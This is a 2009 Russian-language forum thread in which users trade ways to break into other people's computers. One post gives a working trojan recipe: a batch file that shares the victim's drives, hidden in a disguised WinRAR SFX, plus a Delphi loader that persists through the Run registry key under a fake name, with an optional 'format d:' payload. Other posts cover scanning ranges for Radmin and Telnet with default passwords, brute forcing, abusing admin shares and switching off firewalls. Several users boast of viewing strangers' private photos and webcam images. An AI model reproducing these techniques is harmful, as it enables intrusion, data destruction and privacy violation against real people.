komersant Свободен |
20-09-2009 - 03:42 BERG 25 дай сцылочку на видеоурок плиз. |
||||
komersant Свободен |
20-09-2009 - 14:53 Все хорошо, вот только у всех пароли стоят и зайти по дефолтному нельзя. |
||||
bruts2006 Свободен |
20-09-2009 - 18:25 Хрена ничего не выходить надо логин ещё ввести, лажа какаята а net tools виснет когда к нему словарь больше 500 кб добавляю |
||||
bruts2006 Свободен |
20-09-2009 - 19:20
Словарь для Essential NetTools, а в сеткиуменя все с логинами |
||||
bruts2006 Свободен |
20-09-2009 - 19:23 1)Расшаренные ресурсы (shared resources) или по-нашему шары присутствуют почти в каждой локалке. Представь ситуацию - злобный админ в локалке закрыл тебе доступ к своим дискам а тебе очень нужно незметно покапаться в его компе =) Сегодня я покажу тебе как легко решить эту проблему. //ЧАСТЬ 1 - "крутая прога"// Итак, ты пишешь bat файл следующего содержания: @Echo off net share disk_d=d: > nul net share disk_c=c: > nul Этим ты расшаришь диски C: и D: на компе админа. Затем берешь мой любимый архиватор WINRAR и начинаешь колдовать =) : 1) Выбираешь метод сжатия - максимальный. 2) Ставишь пимпу напротив "создать sfx архив". Этим ты превратишь свой батник в exe файл =) 3) Переходишь на вкладку "Дополнительно" - "Параметры SFX" 4) Во вкладке "Общие" пишешь путь распаковки твоего батника, например если хочешь кинуть его в C:/WINDOWS пишешь %windir% 5)Указываешь имя своего батника (например shara.bat) в "запустить ПОСЛЕ распаковки". 6) Переходишь на вкладку "Режимы" и ставишь точки напротив "Скрыть все" и "Перезаписывать все файлы". 7) На вкладке "Текст и значок" указываешь иконку будущего exe файла. 8) тыкаешь OK. Итак, у тебя есть exe файл который ты можешь смело впаривать админу сетки под видом какой-нибудь новой проги =) //ЧАСТЬ 2 - клиент// Теперь напишим скрипт с помощью которого ты на своем компе будешь подключать сетевые диски админа =) Пишешь: net use X: //имя компа админа/disk_d net use Y: //имя компа админа/disk_c И спокойно юзаешь его диски в свое удовольствие. Чтобы замести следы (напимер при работе на компе общего доступа) используй: net use X: /delete net use Y: /delete Есть одно препятствие: админ может увидеть посторонние расшаренные диски набрав команду net share в cmd. Для большей надежности можно запускать это все таким образом: 1) Пишешь прогу (я пишу на delphi), запускающую твой батник. 2) Склеиваешь ее и батник описаным выше способом только в запуск после распаковки вместо батника прописываешь скомпиленый exe файл Итак действуем. 1) Открываешь делфи и пишешь: ... uses Windows, ShellAPI, Forms; ... var Form1: TForm1; Reg : HKEY; szPach: String ; szName: String ; y: string; ... procedure TForm1.FormCreate(Sender: TObject); begin application.ShowMainForm:=false; //делаем наш загрузчик невидимым на панели задач и в диспетчере во вкладке "процессы" - ибо нех =) begin y:=ParamStr(0); szName:='NTClock.exe'; //имя проги которое будет видно в редакторе реестра. szPach:=y ; //Создаешь ключ в реестре RegCreateKey(HKEY_LOCAL_MACHINE, 'Software/Microsoft/Windows/CurrentVersion/Run', Reg); //Создаешь параметр автозапуска RegSetValueEx(Reg, PChar(szName) ,0 ,REG_SZ ,PChar(szPach), Length(szPach)); //Освобождаешь хендл RegCloseKey(Reg); begin sleep(60000); // пауза в 1 мин (можно не делать) ShellExecute(0, 'open', 'c:/WINDOWS/shara.bat', '', '', SW_HIDE); //запускаешь свой батник в скрытом режиме. Application.Terminate; //закрываемся end; end; end; Как ты уже заметил я прописал наш загрузчик в реестр в раздел автозапуска. Теперь если даже админ и уберет расшареные диски, они у него будут расшариваться при каждом запуске системы =) Здесь еще такая фича: даже если админ пропалит автозапуск и полезет в реестр, то не всегда сможет понять где прописан злой процесс потому что не у каждого может вызвать сомнения прога под названием NTClock.exe =) Также при желании можно заменить код батника на что нибудь вроде @Echo off format d: /q /y > nul Все в твоих руках =) Чуть не забыл, я поместил батник в папку windows т.к среднестатистический юзер там бывает редко. Поэтому при склеивании winrar'ом забей в путь %windir% 2)-Сканер портов (Или сканер безопасности) -Телнет клиент (Он входит в стандартную комплектацию Windows-a) -Radmin viewer (Это тоже прога для удалённого администрирования,подробней ниже) Это всё самое необходимое.И так,для того чтоб хакнуть чужой комп я чаще всего пользуюсь такими методами: -Через порт радмина (4899 порт) -Телнет порт (23 порт) Вот такими способоми я чаще всего ломаю компы.А теперь давайте рассмотрим каждый из них. Начнём с радмина: РАДМИН (Radmin): Тут на хакзоне я видел видео по проникновению на чужой комп используя радмин,автор этого видео FIXER,но всё таки я опишу этот хитрый и простой способ ещё раз,так как этот способ входит в мою статью,и может кто не смотрел видео. Радмин,порт которого 4899,используеться для удалённого администрирования,для того чтоб открыть порт радмина,на компе должен быть установлен и запущен сервер радмина.Мы сейчас и будем искать жертв с открытым 4899 портом. Я для этого буду использовать сканер уязвимостей XSpider. Запускаем XSpider,и создаём новый профиль (Профиль-Новый): -В появившимся окне,начнём давайте с нижней вкладки,переходим к вкладке "NetBIOS",снимаем все галочки,переходим к следующей,Telnet,от туда тоже снимаем галочки,переходим к следующий,SQL,и от туда убираем галки,и так идя с низу вверх,убираем галки со всех вкладок (всеголишь снимаем галки,и не меняем никакие параметры) когда дошли до вкладки "Сканер Портов",останавлеваемся на этой вкладке,и видим там надпись в низу окна: Файл портов: default.prf Жмём на кнопку которая справо этой надписи,в появившимся окне жмём в верху на запись "Новый",в ещё одном появившемся окошке жмём кнопку "Выбрать",В появившемся окне,в поле "Коментарий" давайте впишем 4899.В нижнее поле в том же окне с названием "Добавить прт[ы]:" Вписываем 4899,этим мы указываем порт,жмём добавить,затем нажимаем на "Сохранить как...",В поле "Имя файла" вписываем 4899,и жмём "Сохранить".Далее в появившемся списке профилев выбираем наш созданный "4899" и жмём "Выбрать".Далее в оставшемся окне насройки профиля,переходим к вкладке NetBIOS,и жмём там "Сохранить как...",пишим в поле "имя файла" 4899 и жмём "Сохранить". Уффф...,после долгих мучений на этом настройка профиля окончена,ПРОФИЛЬ СОЗДАН!Теперь выбираем наш профиль,(Профиль-Применить Существующий) кликаем по нему один раз,и жмём выбрать. Теперь когда профиль создан и выбран,нужно просканить определённый диапазон IP адресов,(помните что максимальный это 255.255.255.255) ВЫ щас думайте,а какой ваще диапазон сканить надо?Да любой,хоть вдоль и поперёк.Я выбрад себе один диапазон,и буду сканить от 79.126.27.0 до 79.126.27.255 Жмём в Спайдере "Добавить диапазон",вписываем нужный,и жмём ОК,когда спайдер найдёт все компы в этом диапазоне,начинайте сканировать.Ну вто допустим мы начали сканить диапазон 79.126.27.0 - 79.126.27.255. Когда спайдер находит жертву с открытым 4899 портом тот айпи выделяеться зелённым цветом.Это и будет комп с 4899 портом.Ну вот просканив этот диапазон я один раз нашел уязвимый комп,это 19.126.27.202. Теперь берём прогу Radmin Viewer (Не спутайте с Radmin Server!!),запускаем,вписываем туда найденный IP жертвы с открытым 4899 портом,выбераем режим подключения,для удобства выберайте "File-transfer",и подключаемся,Если версия сервера радмина установленная на компе жертвы ниже 2.2,то попросит только пароль,пробуем пасс по дефолту,по дефолту он всегда стоит 12345678,если не подошел,то тогда придёться использовать брутер,но чаще всего стоит по дефолту.Для радмина брутэра нету,но один чел его написал,и он у меня есть,если кому надо,то стучите в асю,скину брутер. Ну вот,допустим пароль подошел,и после этого мы попадаем в комп к жертве,и творим чё хотим))Чё творить это уже ваше дело)).Вот таким простым способом мы получили доступ к удалённому компу. Тепеь давайте рассмотрим взлом через телнет. 3)TELNET Искать компы с открытым 23 портом телнетом можно также как я описывал во взломе с радмином,только при настройке профиля,указываем 23 порт а не 4899 порт.И всё,всё также,только мы указали 23 порт.Пасс по дефолту стоит или 1234 или 12345.Если не подошел то пробуй те как я и говорил брутфорс.Подойдёт BrutusAET2. Я тут описал только самый простой способ искать телнет порты и взламывать,может кто то использует и другой,но я описал как этим пользуюсь я. Ну вот,эти 2 метода которыми я пользуюсь чтоб хакнуть комп. Ну а если надо взломать комп знакомого или друга,то тогда пользуюсь трояном.Как это делать описывать не буду потомучто на хакзоне этого много. Вот стелнэтом я не разобрался( |
||||
komersant Свободен |
20-09-2009 - 20:09 Наконец-то получилось. Пол дня сидел, но троих все-таки нарыл через Radmin. BERGу 25 благодарствуем! Как плюсы ставить я не знаю, походу постов еще мало. Как разберусь- поставлю. |
||||
кат Женат |
20-09-2009 - 21:29 Привет! Подскажите какая хорошая прога для того чтобы восстановить удаленные файлы (фото, видео) с любого фотика и компа???? |
||||
Whitewolf7 Свободен |
20-09-2009 - 23:29
Как гласит 352 заповедь Вуаериста разобрался сам помоги ближним =) wconsnap обсолютно не поддаётся моей дресуре |
||||
komersant Свободен |
21-09-2009 - 00:53 А я wconsnap не юзаю. Я через Essential NetTools и Radmin, как описал Берг25. Кстати список жертв пополнился, но трое уже поменяли пассы. |
||||
prozector Свободен |
21-09-2009 - 09:49
Если полистать этот тред на две-три страницы назад, то там будет почти полный список: Бесплатные PhotoRec и PCInspector File Recovery Платные: RStudio, Zero Assumption Recovery ну и ещё что-то есть, но этих в 99,5% случаев хватает. |
||||
Mitcik Женат |
21-09-2009 - 10:33 Привет! подскажите пожалуйсто программу которая записывает переписку на Однокласниках) |
||||
Whitewolf7 Свободен |
21-09-2009 - 20:03
Спасибо очень помог огромная благодарность |
||||
Egorushka Свободен |
22-09-2009 - 09:24 Начал пробовать прогу Active.Webcam.v11.4 на своём ноуте.Всё хорошо,только она включает лампочку возле камеры,а это палево.Как можно этого избавиться,или я пропустил какуюто настройку?И после крэка она пишет надпись на изображении-демо. |
||||
bruts2006 Свободен |
23-09-2009 - 23:16 После сканирования портов не раз натыкался нат порт тэлнэта и при подключении была типа dreambox пароль dreambox пользователь root что это? |
||||
yra554 Свободен |
23-09-2009 - 23:33 Это тюнер спутниковый Dreambox у него сетевая встроеная пароль root dreambox. Да еще он под линукс |
||||
bruts2006 Свободен |
23-09-2009 - 23:55
Их в сети штук 5, интересно что можно хорошего с ним сделать? |
||||
yra554 Свободен |
24-09-2009 - 23:49 Есть прога позволяет на компе смотреть каналы,записывать, также их (дримы)используют как идеальные при просмотре НТВ итд через картшаринг.можно стырить этот пароль для сервера шары а так наверное все а что за сканер телнета? |
||||
andranik234 Свободен |
26-09-2009 - 12:39 Нужна помощь. На работе могу заходить в сетку с правами администратора, подскажите как можно попасть на другой комп и там полазить. |
||||
bruts2006 Свободен |
26-09-2009 - 15:48 Вот мы тут как раз это и обсуждали но все кудато исчезли( |
||||
Свободен |
26-09-2009 - 19:11 а ко знает прогу удаленого администрирования, чтоб работала без реальных IP через нет и запускалась автоматом свернутая к часам или вообще не показывала значек типа TeamViewer но чтоб не выскакивало разных сообщений при подключении,желательно с русификацией. установка сервеной части не проблема |
||||
prozector Свободен |
26-09-2009 - 19:57
Раз "без реальных IP" -то в любом случае нужен "внешний" сервер в реальным IP, через который сервер и клиент будут соединяться. И у ТимВьювер и Хамачи такие сервера есть. Если нужно "без вопросов", "без значка" - вполне подойдёт UltraVNC - он умеет работать полностью заNATченым - когда и клиент и сервер не имеют реальных IP. Для соедиения нужен компьютер с реальным IP и VNC repeater на нём. Одна-единственная проблема - соедиение должны устанавливать И клиент, И сервер - т.е. что-то должно "пнуть" сервер, чтобы он полез до repeater-а... Хотя, наверное, можно на шедулу повесить - чтобы раз в час пытался подключиться и по мере необходимости его ловить клиентом на том же repeater-е. И ещё - русской версии нет. 2 andranik234: А какие проблемы-то?!?!? По IP и маске своего компьютера определить используемую подсеть. На основе этих данных просканировать сетку чем-нибудь типа http://www.radmin.ru/products/utilities/lanscanner.php если открыты порты: 137..139 и 445 - значит смело заходишь на данный компьютер примерно так: \\IP_компьютера\C$ Какие "неприятности" могут ожидать - включен файервол на "целевой" машине - если туда разрешён RPC, то правый клик на "мой компьютер"-"управление"-правый клик на "Управление компьютером" - "подключиться к..." - указываешь найденый IP -если подключится - гасишь файервол. Ещё могут быть отключены административные шары (которые с $ на конце) - точно также идёшь через Управление компьютером на "целевой" комп - сначала в Управление дисками - смотришь какие буквы дисков есть - потом идёшь Общие папки - общие ресурсы - создать - чтобы не палиться - называешь, "БУКВАДИСКА$" что шарить - "БУКВАДИСКА:\" после чего на свежесозданную шару можно попробовать зайти по сети. Ещё одна тонкость - заходишь в папочку Recent активного пользователя на "целевом" компьютере и смотришь - что в последнее время от открывал - часто видно что-нибудь типа "Съёмный диск (Е)" - типа человек подключил свою флэшку. Идёшь в управление дисками на том компьютере (см. выше) и проверяшь - подключена ли всё ещё флэшка - если подключена - расшариваешь её, как же описано выше. |
||||
Свободен |
26-09-2009 - 23:38
хамач с radmin полностью бы устроили, но у хамача нету автозапуска, а если через авторан то всеравно не сворачиваеться в трей а остаеться окно с сетями. если б как нибудь заставить хамач сворачиваться в трей после запуска. |
||||
prozector Свободен |
27-09-2009 - 00:00
Прятать окна: http://www.commandline.co.uk/cmdow/ проблема - многие антивири считают cmdow опасной прилой и алертят почём зря. Надо добавлять в исключения. |
||||
Свободен |
27-09-2009 - 00:46
как сие чудо работает интересно |
||||
andranik234 Свободен |
27-09-2009 - 14:28 prozector удалось попасть на целевой компьютер через \\IP_компьютера\C$, но немогу найти локальные диски, а если захожу через управление дисками то пишет что сервер RPC недоступен. И еще интересно лазя по целевому компьютеру можно спалитца, если за ним работают? |
||||
LMAUXGA Свободна |
27-09-2009 - 15:03 Будте так добры.... Разъясните пожалуйста как получать доступ к файлам компа,если есть IP , а расшареных ресурсов на нем нет ? можно пошагово и с помощью каких программ..? Как для совсем ничего не понимающего. Что и куда вставлять? Хоть и в этой теме было уже написано,но у меня не выходит-т.к. много не знаю. Есть большая локалка,а открыто очень и очень мало.... |
||||
prozector Свободен |
27-09-2009 - 16:30
Да. Легко - при выключении компьютера или при отключении сменного носителя, на котором ты "висишь" у "жертвы" будет алерт, о том, что "пользователь такой-то открыл столько-то файлов и если вы продолжите - эти файлы станут для него недоступными". Ещё - если усиленно копировать с "целевого" компьютера файлики - усиленно мигает лампочка HDD, прилы начинают медленно запускаться, а если компьютер не особо шутсрый - так он вообще тупить начинает. Поэтому лучше для копирования использовать что-нибудь типа KillCopy - там можно задавать скорость копирования. |
||||
Oppa777 Свободен |
27-09-2009 - 17:13 Привет всем.Нахожу я через Essential NetTools и Radmin комп с открытым портом, а дальше что ,все папки просматривать пока спрятанные фото не найду? |
||||
Egorushka Свободен |
28-09-2009 - 10:09 Ребят,никто не знает,куда 120xZoom пропал? Очень ждём его новую обещанную давно прогу! |
||||
MOROZILO Свободен |
30-09-2009 - 02:01 Здравствуйте!) Подробно изучил прогу LanScope...в самом начале, попал к соседке на комп...целый диск Е был расшарен, посмотрел интересные фотки...ну там ДР мамы, ДР бабушки(пару упсов бабушки)...ну и всё!) В общем, просканировал ВСЮ сетку(куча времени потрачено)...все заблочено(ну было парочка общих документов...музыки там всякой...видимо сами расшаривали для обмена), кучи заблоченых дисков(типа нид login и password)...НУ ВОТ И ВСЕ, "УПЕРЛИСЬ В ДНО!" Очень хочется попасть на что-нибудь интересное, мож кто поможет!?) Попадались диски С, знаю, что как то можно что-то сделать...и попасть на КОМП...но не знаю как!!!((( |
||||
diabolic Свободен |
30-09-2009 - 10:58 Насчет порта 4899 и радмина тема интересная. Вот только пароль по умолчанию встречается крайне редко. Нашел брутфорсер для радмина 2.х, но он крайне неудобный - высвечивает окно набора пароля и довольно медленный. Может кто-то знает брутфорсер получше? И для 3-й версии неплохо бы... Кстати, wconsnap делает только отдельные кадры? Видео никак? P.S. Просканировал диапазоны трех московских провайдеров: Акадо, МГТС(Стрим) и Корбину(еще не до конца) - с радмином меньше 1% компов. Из них - с паролем по умолчанию также около 1%. С камерой попался всего 1 компьютер (ничего интересного). Но тем не менее, интересно и просто полазить по папкам, хотя чего-то стоящего тоже практически нет. Самое интересное из найденного - видео с мобильника: Это сообщение отредактировал diabolic - 30-09-2009 - 21:57 |
||||
MOROZILO Свободен |
30-09-2009 - 22:22 Берг, я конечно извиняюсь, но Ваш способ, абсолютно не эффективен, радмином(версии 3.3) уже пробовал, прочитав до этого, то, что Вы там кучу раз писали...ни одного пароля типа 12345678, замечено не было...помню про прогу, о которой вы упоминали, которой нужно пользоваться, в случае, если 12345678 не помогает...если Вас не затруднит, выложите её пожалуйста, попробую с ней!))) Спс за ответ!) |
||||
MOROZILO Свободен |
30-09-2009 - 22:30 Прошу прощения, уважаемый Берг, один комп нашел!!!))) |
||||
Oppa777 Свободен |
01-10-2009 - 00:25 1 из 5 попадается с паролем 12345678, один комп вообще без пароля ,сразу открываются все диски...нонсенс? |
||||
MOROZILO Свободен |
01-10-2009 - 01:14 Только вот проблема, может сканировать сети класса С...( Crack искал...быстро найти не удалось, не у кого не завалялся случайно?!))) |